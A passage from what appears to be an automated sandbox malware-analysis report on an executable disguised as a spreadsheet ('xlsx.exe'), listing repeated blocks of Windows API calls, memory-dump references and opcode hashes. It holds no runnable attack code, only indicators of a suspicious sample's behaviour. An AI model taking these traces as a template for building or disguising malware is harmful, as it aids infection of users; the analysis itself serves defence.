                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                                            • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                                            • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                                            • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                                            APIs
                                                                              • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID:
                                                                            • API String ID: 849931509-0
                                                                            • Opcode ID: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                                            • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                                            • Opcode Fuzzy Hash: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                                            • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableShow
                                                                            • String ID:
                                                                            • API String ID: 1136574915-0
                                                                            • Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                                            • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                                                            • Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                                            • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                            • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                            • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                            • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                              • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointerwsprintf
                                                                            • String ID:
                                                                            • API String ID: 327478801-0
                                                                            • Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                                            • Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
                                                                            • Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                                            • Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E
                                                                            APIs
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID:
                                                                            • API String ID: 390214022-0
                                                                            • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                            • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                            • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                            • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                            • Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
                                                                            • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                            • Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4
                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                            • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                            • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                            • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                            APIs
                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString
                                                                            • String ID:
                                                                            • API String ID: 1096422788-0
                                                                            • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                            • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                                            • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                            • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                                            • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                                                            • Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                                            • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                            • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                                            • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                            • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                            • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                            • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                            • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                            APIs
                                                                            • SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                            • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                                            • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                            • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                            • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                                            • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                            • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                                            APIs
                                                                            • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                                            • Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
                                                                            • Opcode Fuzzy Hash: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                                            • Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                                            • GetDlgItem.USER32(?,?), ref: 00404B91
                                                                            • GlobalAlloc.KERNEL32(?,?), ref: 00404BDB
                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                                            • SetWindowLongW.USER32(?,?,00405166), ref: 00404C07
                                                                            • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404C1B
